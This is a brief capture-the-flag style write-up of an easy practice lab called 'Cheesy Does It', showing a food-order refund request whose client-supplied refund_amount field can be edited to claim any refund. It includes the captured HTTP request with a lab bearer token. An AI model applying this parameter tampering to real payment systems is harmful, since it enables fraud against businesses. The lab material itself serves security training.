# Cheesy Does It

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FQ3BrquVqhtuW7ypw3F4s%2Fimage.png?alt=media&#x26;token=35b286de-a6fa-446e-ba65-7582cf87fa6e" alt=""><figcaption></figcaption></figure>

After order is successfully delivered, we have an option to report a problem

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F7doFPp3ZJOIOeFJUmwts%2Fimage.png?alt=media&#x26;token=cabbc26e-afe9-471b-97f9-ba2b26750080" alt=""><figcaption></figcaption></figure>

And and option to reqest for refund

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FNqxpJu7tmaRh5OkMeO9c%2Fimage.png?alt=media&#x26;token=b641da52-af69-4bfe-80e8-dc9f391d3f0e" alt=""><figcaption></figcaption></figure>

Refund request looks like this<br>

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FV4rRe1NfamD6QrQEcfUU%2Fimage.png?alt=media&#x26;token=77d180e9-9ce6-4b00-9928-e4f24db60662" alt=""><figcaption></figcaption></figure>

```
POST /api/orders/2/refund HTTP/2
Host: lab-1772469577140-3j5sko.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJzdXNoaWwiLCJpYXQiOjE3NzI0Njk2MzR9.G9s6pB7mCddTrwMNjqGgurcogG0EuVl7vNsyOwa6AzY
Content-Length: 73
Origin: https://lab-1772469577140-3j5sko.labs-app.bugforge.io
Referer: https://lab-1772469577140-3j5sko.labs-app.bugforge.io/orders/2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: green
Priority: u=0
Te: trailers

{"issue_reason":"Order was cold","request_refund":true,"refund_amount":0}
```

We can edit the `refund_amount` and get refund amount as much as we want.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2Fyc87r3aZd0X9sQyuzbgg%2Fimage.png?alt=media&#x26;token=1cd9d8ea-9060-40cb-8b34-463dd0eed3dd" alt=""><figcaption></figcaption></figure>
